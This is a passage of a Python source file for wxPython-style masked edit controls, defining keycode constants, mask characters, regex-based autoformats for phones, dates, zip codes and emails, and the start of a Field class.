_OnCtrl_X(event) 'cut' - calls _Cut() method, to "erase" selection
_OnCtrl_Z(event) 'undo' - resets value to previous value (if any)
_OnChangeField(event) primarily used for tab events, but can be
used for other keys (eg. '.' in IpAddrCtrl)
_OnErase(event) used for backspace and delete
_OnHome(event)
_OnEnd(event)
The following routine provides a hook back to any class derivations, so that
they can react to parameter changes before any value is set/reset as a result of
those changes. (eg. masked.ComboBox needs to detect when the choices list is
modified, either implicitly or explicitly, so it can reset the base control
to have the appropriate choice list *before* the initial value is reset to match.)
_OnCtrlParametersChanged()
Accessor Functions
------------------
For convenience, each class derived from MaskedEditMixin should
define an accessors mixin, so that it exposes only those parameters
that make sense for the derivation. This is done with an intermediate
level of inheritance, ie:
class BaseMaskedTextCtrl( TextCtrl, MaskedEditMixin ):
class TextCtrl( BaseMaskedTextCtrl, MaskedEditAccessorsMixin ):
class ComboBox( BaseMaskedComboBox, MaskedEditAccessorsMixin ):
class NumCtrl( BaseMaskedTextCtrl, MaskedNumCtrlAccessorsMixin ):
class IpAddrCtrl( BaseMaskedTextCtrl, IpAddrCtrlAccessorsMixin ):
class TimeCtrl( BaseMaskedTextCtrl, TimeCtrlAccessorsMixin ):
etc.
Each accessors mixin defines Get/Set functions for the base class parameters
that are appropriate for that derivation.
This allows the base classes to be "more generic," exposing the widest
set of options, while not requiring derived classes to be so general.
"""
import copy
import difflib
import re
import string
import types
import wx
# jmg 12/9/03 - when we cut ties with Py 2.2 and earlier, this would
# be a good place to implement the 2.3 logger class
from wx.tools.dbg import Logger
##dbg = Logger()
##dbg(enable=1)
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
## Constants for identifying control keys and classes of keys:
## Keycodes for the Ctrl-<letter> accelerators handled by the masked controls.
## wx does not predefine these, so derive them arithmetically: Ctrl-A maps to
## keycode 1, Ctrl-B to 2, etc.  (The (ord(X)+1) - ord('A') form makes the
## letter being encoded obvious at a glance.)
WXK_CTRL_A = (ord('A')+1) - ord('A') ## These keys are not already defined in wx
WXK_CTRL_C = (ord('C')+1) - ord('A')
WXK_CTRL_S = (ord('S')+1) - ord('A')
WXK_CTRL_V = (ord('V')+1) - ord('A')
WXK_CTRL_X = (ord('X')+1) - ord('A')
WXK_CTRL_Z = (ord('Z')+1) - ord('A')

## Keys that navigate within/between fields (cursor movement, tab, enter, paging).
nav = (
    wx.WXK_BACK, wx.WXK_LEFT, wx.WXK_RIGHT, wx.WXK_UP, wx.WXK_DOWN, wx.WXK_TAB,
    wx.WXK_HOME, wx.WXK_END, wx.WXK_RETURN, wx.WXK_PRIOR, wx.WXK_NEXT,
    wx.WXK_NUMPAD_LEFT, wx.WXK_NUMPAD_RIGHT, wx.WXK_NUMPAD_UP, wx.WXK_NUMPAD_DOWN,
    wx.WXK_NUMPAD_HOME, wx.WXK_NUMPAD_END, wx.WXK_NUMPAD_ENTER, wx.WXK_NUMPAD_PRIOR, wx.WXK_NUMPAD_NEXT
    )

## Keys that edit the control's contents (erase/insert plus the Ctrl accelerators above).
control = (
    wx.WXK_BACK, wx.WXK_DELETE, wx.WXK_INSERT,
    wx.WXK_NUMPAD_DELETE, wx.WXK_NUMPAD_INSERT,
    WXK_CTRL_A, WXK_CTRL_C, WXK_CTRL_S, WXK_CTRL_V,
    WXK_CTRL_X, WXK_CTRL_Z
    )
# Because unicode can go over the ansi character range, we need to explicitly test
# for all non-visible keystrokes, rather than just assuming a particular range for
# visible characters:
# Because unicode can go over the ansi character range, we need to explicitly test
# for all non-visible keystrokes, rather than just assuming a particular range for
# visible characters.  This is the complete set of keycodes treated as
# "control" (non-printing) keys: ASCII control codes 0-31, the nav/control
# tuples above, and every special wx key.
# NOTE: list(range(32)) rather than bare range(32) — identical under Python 2
# (where range() already returns a list) but also valid list concatenation
# under Python 3.
wx_control_keycodes = list(range(32)) + list(nav) + list(control) + [
    wx.WXK_START, wx.WXK_LBUTTON, wx.WXK_RBUTTON, wx.WXK_CANCEL, wx.WXK_MBUTTON,
    wx.WXK_CLEAR, wx.WXK_SHIFT, wx.WXK_CONTROL, wx.WXK_MENU, wx.WXK_PAUSE,
    wx.WXK_CAPITAL, wx.WXK_SELECT, wx.WXK_PRINT, wx.WXK_EXECUTE, wx.WXK_SNAPSHOT,
    wx.WXK_HELP, wx.WXK_NUMPAD0, wx.WXK_NUMPAD1, wx.WXK_NUMPAD2, wx.WXK_NUMPAD3,
    wx.WXK_NUMPAD4, wx.WXK_NUMPAD5, wx.WXK_NUMPAD6, wx.WXK_NUMPAD7, wx.WXK_NUMPAD8,
    wx.WXK_NUMPAD9, wx.WXK_MULTIPLY, wx.WXK_ADD, wx.WXK_SEPARATOR, wx.WXK_SUBTRACT,
    wx.WXK_DECIMAL, wx.WXK_DIVIDE, wx.WXK_F1, wx.WXK_F2, wx.WXK_F3, wx.WXK_F4,
    wx.WXK_F5, wx.WXK_F6, wx.WXK_F7, wx.WXK_F8, wx.WXK_F9, wx.WXK_F10, wx.WXK_F11,
    wx.WXK_F12, wx.WXK_F13, wx.WXK_F14, wx.WXK_F15, wx.WXK_F16, wx.WXK_F17,
    wx.WXK_F18, wx.WXK_F19, wx.WXK_F20, wx.WXK_F21, wx.WXK_F22, wx.WXK_F23,
    wx.WXK_F24, wx.WXK_NUMLOCK, wx.WXK_SCROLL, wx.WXK_PAGEUP, wx.WXK_PAGEDOWN,
    wx.WXK_NUMPAD_SPACE, wx.WXK_NUMPAD_TAB, wx.WXK_NUMPAD_ENTER, wx.WXK_NUMPAD_F1,
    wx.WXK_NUMPAD_F2, wx.WXK_NUMPAD_F3, wx.WXK_NUMPAD_F4, wx.WXK_NUMPAD_HOME,
    wx.WXK_NUMPAD_LEFT, wx.WXK_NUMPAD_UP, wx.WXK_NUMPAD_RIGHT, wx.WXK_NUMPAD_DOWN,
    wx.WXK_NUMPAD_PRIOR, wx.WXK_NUMPAD_PAGEUP, wx.WXK_NUMPAD_NEXT, wx.WXK_NUMPAD_PAGEDOWN,
    wx.WXK_NUMPAD_END, wx.WXK_NUMPAD_BEGIN, wx.WXK_NUMPAD_INSERT, wx.WXK_NUMPAD_DELETE,
    wx.WXK_NUMPAD_EQUAL, wx.WXK_NUMPAD_MULTIPLY, wx.WXK_NUMPAD_ADD, wx.WXK_NUMPAD_SEPARATOR,
    wx.WXK_NUMPAD_SUBTRACT, wx.WXK_NUMPAD_DECIMAL, wx.WXK_NUMPAD_DIVIDE, wx.WXK_WINDOWS_LEFT,
    wx.WXK_WINDOWS_RIGHT, wx.WXK_WINDOWS_MENU, wx.WXK_COMMAND,
    # Hardware-specific buttons
    wx.WXK_SPECIAL1, wx.WXK_SPECIAL2, wx.WXK_SPECIAL3, wx.WXK_SPECIAL4, wx.WXK_SPECIAL5,
    wx.WXK_SPECIAL6, wx.WXK_SPECIAL7, wx.WXK_SPECIAL8, wx.WXK_SPECIAL9, wx.WXK_SPECIAL10,
    wx.WXK_SPECIAL11, wx.WXK_SPECIAL12, wx.WXK_SPECIAL13, wx.WXK_SPECIAL14, wx.WXK_SPECIAL15,
    wx.WXK_SPECIAL16, wx.WXK_SPECIAL17, wx.WXK_SPECIAL18, wx.WXK_SPECIAL19, wx.WXK_SPECIAL20
    ]
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
## Constants for masking. This is where mask characters
## are defined.
## maskchars used to identify valid mask characters from all others
## # - allow numeric 0-9 only
## A - allow uppercase only. Combine with forceupper to force lowercase to upper
## a - allow lowercase only. Combine with forcelower to force upper to lowercase
## C - allow any letter, upper or lower
## X - allow string.letters, string.punctuation, string.digits
## & - allow string.punctuation only (doesn't include all unicode symbols)
## * - allow any visible character
## Note: locale settings affect what "uppercase", lowercase, etc comprise.
## Note: '|' is not a maskchar, in that it is a mask processing directive, and so
## does not appear here.
##
## The set of characters recognized as mask-specification characters
## (see the mask-character legend in the comments above).
maskchars = ("#","A","a","X","C","N",'*','&')

## All "ANSI" characters: codes 32..255 inclusive.  Built with a single
## join rather than the previous quadratic `+=` loop, and with range()
## rather than the Python-2-only xrange() (identical behavior here).
ansichars = ''.join([chr(i) for i in range(32, 256)])
## Regular-expression alternation fragments used to build the validRegex
## entries of the autoformat dictionary below.
months = '(01|02|03|04|05|06|07|08|09|10|11|12)'
charmonths = '(Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|JAN|FEB|MAR|APR|MAY|JUN|JUL|AUG|SEP|OCT|NOV|DEC|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)'
## Maps a lowercase 3-letter month abbreviation to its 1-based month number.
charmonths_dict = {'jan': 1, 'feb': 2, 'mar': 3, 'apr': 4, 'may': 5, 'jun': 6,
                   'jul': 7, 'aug': 8, 'sep': 9, 'oct': 10, 'nov': 11, 'dec': 12}

days = '(01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|16|17|18|19|20|21|22|23|24|25|26|27|28|29|30|31)'
## 12-hour clock hours: leading zero or leading space allowed (' 1'..'12').
hours = '(0\d| \d|1[012])'
milhours = '(00|01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|16|17|18|19|20|21|22|23)'
minutes = """(00|01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|\
16|17|18|19|20|21|22|23|24|25|26|27|28|29|30|31|32|33|34|35|\
36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52|53|54|55|\
56|57|58|59)"""
seconds = minutes

## Characters excluded from the "AM/PM" mask position so that only
## A/P (plus lowercase/accented lookalikes) can be typed there.
am_pm_exclude = 'BCDEFGHIJKLMNOQRSTUVWXYZ\x8a\x8c\x8e\x9f\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd8\xd9\xda\xdb\xdc\xdd\xde'

## Two-letter US state/territory codes (includes DC, GU, PR, VI).
states = "AL,AK,AZ,AR,CA,CO,CT,DE,DC,FL,GA,GU,HI,ID,IL,IN,IA,KS,KY,LA,MA,ME,MD,MI,MN,MS,MO,MT,NE,NV,NH,NJ,NM,NY,NC,ND,OH,OK,OR,PA,PR,RI,SC,SD,TN,TX,UT,VA,VT,VI,WA,WV,WI,WY".split(',')

## Full state names used as choices for the USSTATENAME autoformat.
## Fixed typo: "North Dakokta" -> "North Dakota".
## NOTE(review): this list has 52 entries while `states` above has 54
## (no names for GU/VI) -- preserved as-is; confirm before relying on
## positional correspondence between the two lists.
state_names = ['Alabama','Alaska','Arizona','Arkansas',
               'California','Colorado','Connecticut',
               'Delaware','District of Columbia',
               'Florida','Georgia','Hawaii',
               'Idaho','Illinois','Indiana','Iowa',
               'Kansas','Kentucky','Louisiana',
               'Maine','Maryland','Massachusetts','Michigan',
               'Minnesota','Mississippi','Missouri','Montana',
               'Nebraska','Nevada','New Hampshire','New Jersey',
               'New Mexico','New York','North Carolina','North Dakota',
               'Ohio','Oklahoma','Oregon',
               'Pennsylvania','Puerto Rico','Rhode Island',
               'South Carolina','South Dakota',
               'Tennessee','Texas','Utah',
               'Vermont','Virginia',
               'Washington','West Virginia',
               'Wisconsin','Wyoming']
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
## The following dictionary defines the current set of autoformats:
## Dictionary of predefined autoformats.  Each entry supplies at minimum a
## mask and a human-readable description; most also supply formatcodes and a
## validRegex built from the alternation fragments defined above.
## Changes from the previous revision:
##  * Python-2-only string.join(seq, sep) replaced with sep.join(seq)
##    (identical result, works on both Python 2 and 3).
##  * Literal '.' separators in validRegex values are now escaped ('\.') --
##    an unescaped '.' matches ANY character, so e.g. "2004x01x01" would
##    previously have validated against the YYYY.MM.DD patterns.
##  * "w/hypens" typos in descriptions corrected to "w/hyphens".
masktags = {
    "USPHONEFULLEXT": {
        'mask': "(###) ###-#### x:###",
        'formatcodes': 'F^->',
        'validRegex': "^\(\d{3}\) \d{3}-\d{4}",
        'description': "Phone Number w/opt. ext"
    },
    "USPHONETIGHTEXT": {
        'mask': "###-###-#### x:###",
        'formatcodes': 'F^->',
        'validRegex': "^\d{3}-\d{3}-\d{4}",
        'description': "Phone Number\n (w/hyphens and opt. ext)"
    },
    "USPHONEFULL": {
        'mask': "(###) ###-####",
        'formatcodes': 'F^->',
        'validRegex': "^\(\d{3}\) \d{3}-\d{4}",
        'description': "Phone Number only"
    },
    "USPHONETIGHT": {
        'mask': "###-###-####",
        'formatcodes': 'F^->',
        'validRegex': "^\d{3}-\d{3}-\d{4}",
        'description': "Phone Number\n(w/hyphens)"
    },
    "USSTATE": {
        'mask': "AA",
        'formatcodes': 'F!V',
        'validRegex': "([ACDFGHIKLMNOPRSTUVW] |%s)" % '|'.join(states),
        'choices': states,
        'choiceRequired': True,
        'description': "US State Code"
    },
    "USSTATENAME": {
        'mask': "ACCCCCCCCCCCCCCCCCCC",
        'formatcodes': 'F_',
        'validRegex': "([ACDFGHIKLMNOPRSTUVW] |%s)" % '|'.join(state_names),
        'choices': state_names,
        'choiceRequired': True,
        'description': "US State Name"
    },

    "USDATETIMEMMDDYYYY/HHMMSS": {
        'mask': "##/##/#### ##:##:## AM",
        'excludeChars': am_pm_exclude,
        'formatcodes': 'DF!',
        'validRegex': '^' + months + '/' + days + '/' + '\d{4} ' + hours + ':' + minutes + ':' + seconds + ' (A|P)M',
        'description': "US Date + Time"
    },
    "USDATETIMEMMDDYYYY-HHMMSS": {
        'mask': "##-##-#### ##:##:## AM",
        'excludeChars': am_pm_exclude,
        'formatcodes': 'DF!',
        'validRegex': '^' + months + '-' + days + '-' + '\d{4} ' + hours + ':' + minutes + ':' + seconds + ' (A|P)M',
        'description': "US Date + Time\n(w/hyphens)"
    },
    "USDATE24HRTIMEMMDDYYYY/HHMMSS": {
        'mask': "##/##/#### ##:##:##",
        'formatcodes': 'DF',
        'validRegex': '^' + months + '/' + days + '/' + '\d{4} ' + milhours + ':' + minutes + ':' + seconds,
        'description': "US Date + 24Hr (Military) Time"
    },
    "USDATE24HRTIMEMMDDYYYY-HHMMSS": {
        'mask': "##-##-#### ##:##:##",
        'formatcodes': 'DF',
        'validRegex': '^' + months + '-' + days + '-' + '\d{4} ' + milhours + ':' + minutes + ':' + seconds,
        'description': "US Date + 24Hr Time\n(w/hyphens)"
    },
    "USDATETIMEMMDDYYYY/HHMM": {
        'mask': "##/##/#### ##:## AM",
        'excludeChars': am_pm_exclude,
        'formatcodes': 'DF!',
        'validRegex': '^' + months + '/' + days + '/' + '\d{4} ' + hours + ':' + minutes + ' (A|P)M',
        'description': "US Date + Time\n(without seconds)"
    },
    "USDATE24HRTIMEMMDDYYYY/HHMM": {
        'mask': "##/##/#### ##:##",
        'formatcodes': 'DF',
        'validRegex': '^' + months + '/' + days + '/' + '\d{4} ' + milhours + ':' + minutes,
        'description': "US Date + 24Hr Time\n(without seconds)"
    },
    "USDATETIMEMMDDYYYY-HHMM": {
        'mask': "##-##-#### ##:## AM",
        'excludeChars': am_pm_exclude,
        'formatcodes': 'DF!',
        'validRegex': '^' + months + '-' + days + '-' + '\d{4} ' + hours + ':' + minutes + ' (A|P)M',
        'description': "US Date + Time\n(w/hyphens and w/o secs)"
    },
    "USDATE24HRTIMEMMDDYYYY-HHMM": {
        'mask': "##-##-#### ##:##",
        'formatcodes': 'DF',
        'validRegex': '^' + months + '-' + days + '-' + '\d{4} ' + milhours + ':' + minutes,
        'description': "US Date + 24Hr Time\n(w/hyphens and w/o seconds)"
    },
    "USDATEMMDDYYYY/": {
        'mask': "##/##/####",
        'formatcodes': 'DF',
        'validRegex': '^' + months + '/' + days + '/' + '\d{4}',
        'description': "US Date\n(MMDDYYYY)"
    },
    "USDATEMMDDYY/": {
        'mask': "##/##/##",
        'formatcodes': 'DF',
        'validRegex': '^' + months + '/' + days + '/\d\d',
        'description': "US Date\n(MMDDYY)"
    },
    "USDATEMMDDYYYY-": {
        'mask': "##-##-####",
        'formatcodes': 'DF',
        'validRegex': '^' + months + '-' + days + '-' + '\d{4}',
        'description': "MM-DD-YYYY"
    },

    "EUDATEYYYYMMDD/": {
        'mask': "####/##/##",
        'formatcodes': 'DF',
        'validRegex': '^' + '\d{4}' + '/' + months + '/' + days,
        'description': "YYYY/MM/DD"
    },
    "EUDATEYYYYMMDD.": {
        'mask': "####.##.##",
        'formatcodes': 'DF',
        'validRegex': '^' + '\d{4}' + '\.' + months + '\.' + days,
        'description': "YYYY.MM.DD"
    },
    "EUDATEDDMMYYYY/": {
        'mask': "##/##/####",
        'formatcodes': 'DF',
        'validRegex': '^' + days + '/' + months + '/' + '\d{4}',
        'description': "DD/MM/YYYY"
    },
    "EUDATEDDMMYYYY.": {
        'mask': "##.##.####",
        'formatcodes': 'DF',
        'validRegex': '^' + days + '\.' + months + '\.' + '\d{4}',
        'description': "DD.MM.YYYY"
    },
    "EUDATEDDMMMYYYY.": {
        'mask': "##.CCC.####",
        'formatcodes': 'DF',
        'validRegex': '^' + days + '\.' + charmonths + '\.' + '\d{4}',
        'description': "DD.Month.YYYY"
    },
    "EUDATEDDMMMYYYY/": {
        'mask': "##/CCC/####",
        'formatcodes': 'DF',
        'validRegex': '^' + days + '/' + charmonths + '/' + '\d{4}',
        'description': "DD/Month/YYYY"
    },

    "EUDATETIMEYYYYMMDD/HHMMSS": {
        'mask': "####/##/## ##:##:## AM",
        'excludeChars': am_pm_exclude,
        'formatcodes': 'DF!',
        'validRegex': '^' + '\d{4}' + '/' + months + '/' + days + ' ' + hours + ':' + minutes + ':' + seconds + ' (A|P)M',
        'description': "YYYY/MM/DD HH:MM:SS"
    },
    "EUDATETIMEYYYYMMDD.HHMMSS": {
        'mask': "####.##.## ##:##:## AM",
        'excludeChars': am_pm_exclude,
        'formatcodes': 'DF!',
        'validRegex': '^' + '\d{4}' + '\.' + months + '\.' + days + ' ' + hours + ':' + minutes + ':' + seconds + ' (A|P)M',
        'description': "YYYY.MM.DD HH:MM:SS"
    },
    "EUDATETIMEDDMMYYYY/HHMMSS": {
        'mask': "##/##/#### ##:##:## AM",
        'excludeChars': am_pm_exclude,
        'formatcodes': 'DF!',
        'validRegex': '^' + days + '/' + months + '/' + '\d{4} ' + hours + ':' + minutes + ':' + seconds + ' (A|P)M',
        'description': "DD/MM/YYYY HH:MM:SS"
    },
    "EUDATETIMEDDMMYYYY.HHMMSS": {
        'mask': "##.##.#### ##:##:## AM",
        'excludeChars': am_pm_exclude,
        'formatcodes': 'DF!',
        'validRegex': '^' + days + '\.' + months + '\.' + '\d{4} ' + hours + ':' + minutes + ':' + seconds + ' (A|P)M',
        'description': "DD.MM.YYYY HH:MM:SS"
    },
    "EUDATETIMEYYYYMMDD/HHMM": {
        'mask': "####/##/## ##:## AM",
        'excludeChars': am_pm_exclude,
        'formatcodes': 'DF!',
        'validRegex': '^' + '\d{4}' + '/' + months + '/' + days + ' ' + hours + ':' + minutes + ' (A|P)M',
        'description': "YYYY/MM/DD HH:MM"
    },
    "EUDATETIMEYYYYMMDD.HHMM": {
        'mask': "####.##.## ##:## AM",
        'excludeChars': am_pm_exclude,
        'formatcodes': 'DF!',
        'validRegex': '^' + '\d{4}' + '\.' + months + '\.' + days + ' ' + hours + ':' + minutes + ' (A|P)M',
        'description': "YYYY.MM.DD HH:MM"
    },
    "EUDATETIMEDDMMYYYY/HHMM": {
        'mask': "##/##/#### ##:## AM",
        'excludeChars': am_pm_exclude,
        'formatcodes': 'DF!',
        'validRegex': '^' + days + '/' + months + '/' + '\d{4} ' + hours + ':' + minutes + ' (A|P)M',
        'description': "DD/MM/YYYY HH:MM"
    },
    "EUDATETIMEDDMMYYYY.HHMM": {
        'mask': "##.##.#### ##:## AM",
        'excludeChars': am_pm_exclude,
        'formatcodes': 'DF!',
        'validRegex': '^' + days + '\.' + months + '\.' + '\d{4} ' + hours + ':' + minutes + ' (A|P)M',
        'description': "DD.MM.YYYY HH:MM"
    },

    "EUDATE24HRTIMEYYYYMMDD/HHMMSS": {
        'mask': "####/##/## ##:##:##",
        'formatcodes': 'DF',
        'validRegex': '^' + '\d{4}' + '/' + months + '/' + days + ' ' + milhours + ':' + minutes + ':' + seconds,
        'description': "YYYY/MM/DD 24Hr Time"
    },
    "EUDATE24HRTIMEYYYYMMDD.HHMMSS": {
        'mask': "####.##.## ##:##:##",
        'formatcodes': 'DF',
        'validRegex': '^' + '\d{4}' + '\.' + months + '\.' + days + ' ' + milhours + ':' + minutes + ':' + seconds,
        'description': "YYYY.MM.DD 24Hr Time"
    },
    "EUDATE24HRTIMEDDMMYYYY/HHMMSS": {
        'mask': "##/##/#### ##:##:##",
        'formatcodes': 'DF',
        'validRegex': '^' + days + '/' + months + '/' + '\d{4} ' + milhours + ':' + minutes + ':' + seconds,
        'description': "DD/MM/YYYY 24Hr Time"
    },
    "EUDATE24HRTIMEDDMMYYYY.HHMMSS": {
        'mask': "##.##.#### ##:##:##",
        'formatcodes': 'DF',
        'validRegex': '^' + days + '\.' + months + '\.' + '\d{4} ' + milhours + ':' + minutes + ':' + seconds,
        'description': "DD.MM.YYYY 24Hr Time"
    },
    "EUDATE24HRTIMEYYYYMMDD/HHMM": {
        'mask': "####/##/## ##:##",
        'formatcodes': 'DF',
        'validRegex': '^' + '\d{4}' + '/' + months + '/' + days + ' ' + milhours + ':' + minutes,
        'description': "YYYY/MM/DD 24Hr Time\n(w/o seconds)"
    },
    "EUDATE24HRTIMEYYYYMMDD.HHMM": {
        'mask': "####.##.## ##:##",
        'formatcodes': 'DF',
        'validRegex': '^' + '\d{4}' + '\.' + months + '\.' + days + ' ' + milhours + ':' + minutes,
        'description': "YYYY.MM.DD 24Hr Time\n(w/o seconds)"
    },
    "EUDATE24HRTIMEDDMMYYYY/HHMM": {
        'mask': "##/##/#### ##:##",
        'formatcodes': 'DF',
        'validRegex': '^' + days + '/' + months + '/' + '\d{4} ' + milhours + ':' + minutes,
        'description': "DD/MM/YYYY 24Hr Time\n(w/o seconds)"
    },
    "EUDATE24HRTIMEDDMMYYYY.HHMM": {
        'mask': "##.##.#### ##:##",
        'formatcodes': 'DF',
        'validRegex': '^' + days + '\.' + months + '\.' + '\d{4} ' + milhours + ':' + minutes,
        'description': "DD.MM.YYYY 24Hr Time\n(w/o seconds)"
    },

    "TIMEHHMMSS": {
        'mask': "##:##:## AM",
        'excludeChars': am_pm_exclude,
        'formatcodes': 'TF!',
        'validRegex': '^' + hours + ':' + minutes + ':' + seconds + ' (A|P)M',
        'description': "HH:MM:SS (A|P)M\n(see TimeCtrl)"
    },
    "TIMEHHMM": {
        'mask': "##:## AM",
        'excludeChars': am_pm_exclude,
        'formatcodes': 'TF!',
        'validRegex': '^' + hours + ':' + minutes + ' (A|P)M',
        'description': "HH:MM (A|P)M\n(see TimeCtrl)"
    },
    "24HRTIMEHHMMSS": {
        'mask': "##:##:##",
        'formatcodes': 'TF',
        'validRegex': '^' + milhours + ':' + minutes + ':' + seconds,
        'description': "24Hr HH:MM:SS\n(see TimeCtrl)"
    },
    "24HRTIMEHHMM": {
        'mask': "##:##",
        'formatcodes': 'TF',
        'validRegex': '^' + milhours + ':' + minutes,
        'description': "24Hr HH:MM\n(see TimeCtrl)"
    },

    "USSOCIALSEC": {
        'mask': "###-##-####",
        'formatcodes': 'F',
        'validRegex': "\d{3}-\d{2}-\d{4}",
        'description': "Social Sec#"
    },
    "CREDITCARD": {
        'mask': "####-####-####-####",
        'formatcodes': 'F',
        'validRegex': "\d{4}-\d{4}-\d{4}-\d{4}",
        'description': "Credit Card"
    },
    "EXPDATEMMYY": {
        'mask': "##/##",
        'formatcodes': "F",
        'validRegex': "^" + months + "/\d\d",
        'description': "Expiration MM/YY"
    },
    "USZIP": {
        'mask': "#####",
        'formatcodes': 'F',
        'validRegex': "^\d{5}",
        'description': "US 5-digit zip code"
    },
    "USZIPPLUS4": {
        'mask': "#####-####",
        'formatcodes': 'F',
        'validRegex': "\d{5}-(\s{4}|\d{4})",
        'description': "US zip+4 code"
    },
    "PERCENT": {
        'mask': "0.##",
        'formatcodes': 'F',
        'validRegex': "^0\.\d\d",
        'description': "Percentage"
    },
    "AGE": {
        'mask': "###",
        'formatcodes': "F",
        'validRegex': "^[1-9]{1} |[1-9][0-9] |1[0|1|2][0-9]",
        'description': "Age"
    },
    "EMAIL": {
        'mask': "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
        'excludeChars': " \\/*&%$#!+='\"",
        'formatcodes': "F>",
        'validRegex': "^\w+([\-\.]\w+)*@((([a-zA-Z0-9]+(\-[a-zA-Z0-9]+)*\.)+)[a-zA-Z]{2,4}|\[(\d|\d\d|(1\d\d|2[0-4]\d|25[0-5]))(\.(\d|\d\d|(1\d\d|2[0-4]\d|25[0-5]))){3}\]) *$",
        'description': "Email address"
    },
    "IPADDR": {
        'mask': "###.###.###.###",
        'formatcodes': 'F_Sr',
        'validRegex': "( \d| \d\d|(1\d\d|2[0-4]\d|25[0-5]))(\.( \d| \d\d|(1\d\d|2[0-4]\d|25[0-5]))){3}",
        'description': "IP Address\n(see IpAddrCtrl)"
    }
}

# build demo-friendly dictionary of descriptions of autoformats
autoformats = []
for key, value in masktags.items():
    autoformats.append((key, value['description']))
autoformats.sort()
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
class Field:
    """
    This class manages the individual fields in a masked edit control.
    Each field has a zero-based index, indicating its position in the
    control, an extent, an associated mask, and a plethora of optional
    parameters.  Fields can be instantiated and then associated with
    parent masked controls, in order to provide field-specific configuration.
    Alternatively, fields will be implicitly created by the parent control
    if not provided at construction, at which point, the fields can then
    be manipulated by the control's .SetFieldParameters() method.
    """
    ## Canonical set of per-field parameters and their default values.
    valid_params = {
        'index': None,                    ## which field of mask; set by parent control.
        'mask': "",                       ## mask chars for this field
        'extent': (),                     ## (edit start, edit_end) of field; set by parent control.
        'formatcodes': "",                ## codes indicating formatting options for the control
        'fillChar': ' ',                  ## used as initial value for each mask position if initial value is not given
        'groupChar': ',',                 ## used with numeric fields; indicates what char groups 3-tuple digits
        'decimalChar': '.',               ## used with numeric fields; indicates what char separates integer from fraction
        'shiftDecimalChar': '>',          ## used with numeric fields, indicates what is above the decimal point char on keyboard
        'useParensForNegatives': False,   ## used with numeric fields, indicates that () should be used vs. - to show negative numbers.
        'defaultValue': "",               ## use if you want different positional defaults vs. all the same fillChar
        'excludeChars': "",               ## optional string of chars to exclude even if main mask type does
        'includeChars': "",               ## optional string of chars to allow even if main mask type doesn't
        'validRegex': "",                 ## optional regular expression to use to validate the control
        'validRange': (),                 ## Optional hi-low range for numerics
        'choices': [],                    ## Optional list for character expressions
        'choiceRequired': False,          ## If choices supplied this specifies if valid value must be in the list
        'compareNoCase': False,           ## Optional flag to indicate whether or not to use case-insensitive list search
        'autoSelect': False,              ## Set to True to try auto-completion on each keystroke:
        'validFunc': None,                ## Optional function for defining additional, possibly dynamic validation constraints on contrl
        'validRequired': False,           ## Set to True to disallow input that results in an invalid value
        'emptyInvalid': False,            ## Set to True to make EMPTY = INVALID
        'description': "",                ## primarily for autoformats, but could be useful elsewhere
        'raiseOnInvalidPaste': False,     ## if True, paste into field will cause ValueError
        'stopFieldChangeIfInvalid': False,## if True, disallow field navigation out of invalid field
    }

    # This list contains all parameters that when set at the control level should
    # propagate down to each field:
    propagating_params = ('fillChar', 'groupChar', 'decimalChar', 'useParensForNegatives',
                          'compareNoCase', 'emptyInvalid', 'validRequired', 'raiseOnInvalidPaste',
                          'stopFieldChangeIfInvalid')

    def __init__(self, **kwargs):
        """
        This is the "constructor" for setting up parameters for fields.
        a field_index of -1 is used to indicate "the entire control."
        """
####        dbg('Field::Field', indent=1)
        # Validate legitimate set of parameters:
        for key in kwargs.keys():
            if key not in Field.valid_params.keys():
####                dbg(indent=0)
                ae = AttributeError('invalid parameter "%s"' % (key))
                ae.attribute = key
                raise ae

        # Set defaults for each parameter for this instance, and fully
        # populate initial parameter list for configuration:
        for key, value in Field.valid_params.items():
            setattr(self, '_' + key, copy.copy(value))
            if not kwargs.has_key(key):
                kwargs[key] = copy.copy(value)

        self._autoCompleteIndex = -1
        self._SetParameters(**kwargs)
        self._ValidateParameters(**kwargs)
####        dbg(indent=0)

    def _SetParameters(self, **kwargs):
        """
        This function can be used to set individual or multiple parameters for
        a masked edit field parameter after construction.
        """
##        dbg(suspend=1)
##        dbg('maskededit.Field::_SetParameters', indent=1)
        # Validate keyword arguments:
        for key in kwargs.keys():
            if key not in Field.valid_params.keys():
##                dbg(indent=0, suspend=0)
                ae = AttributeError('invalid keyword argument "%s"' % key)
                ae.attribute = key
                raise ae

##        if self._index is not None: dbg('field index:', self._index)
##        dbg('parameters:', indent=1)
        for key, value in kwargs.items():
##            dbg('%s:' % key, value)
            pass
##        dbg(indent=0)

        old_fillChar = self._fillChar   # store so we can change choice lists accordingly if it changes

        # First, Assign all parameters specified:
        for key in Field.valid_params.keys():
            if kwargs.has_key(key):
                setattr(self, '_' + key, kwargs[key])

        # Derive the individual format-code flags whenever formatcodes is set/changed:
        if kwargs.has_key('formatcodes'):   # (set/changed)
            self._forceupper = '!' in self._formatcodes
            self._forcelower = '^' in self._formatcodes
            self._groupdigits = ',' in self._formatcodes
            self._okSpaces = '_' in self._formatcodes
            self._padZero = '0' in self._formatcodes
            self._autofit = 'F' in self._formatcodes
            self._insertRight = 'r' in self._formatcodes
            self._allowInsert = '>' in self._formatcodes
            self._alignRight = 'R' in self._formatcodes or 'r' in self._formatcodes
            self._moveOnFieldFull = not '<' in self._formatcodes
            self._selectOnFieldEntry = 'S' in self._formatcodes

        if kwargs.has_key('groupChar'):
            self._groupChar = kwargs['groupChar']
        if kwargs.has_key('decimalChar'):
            self._decimalChar = kwargs['decimalChar']
        if kwargs.has_key('shiftDecimalChar'):
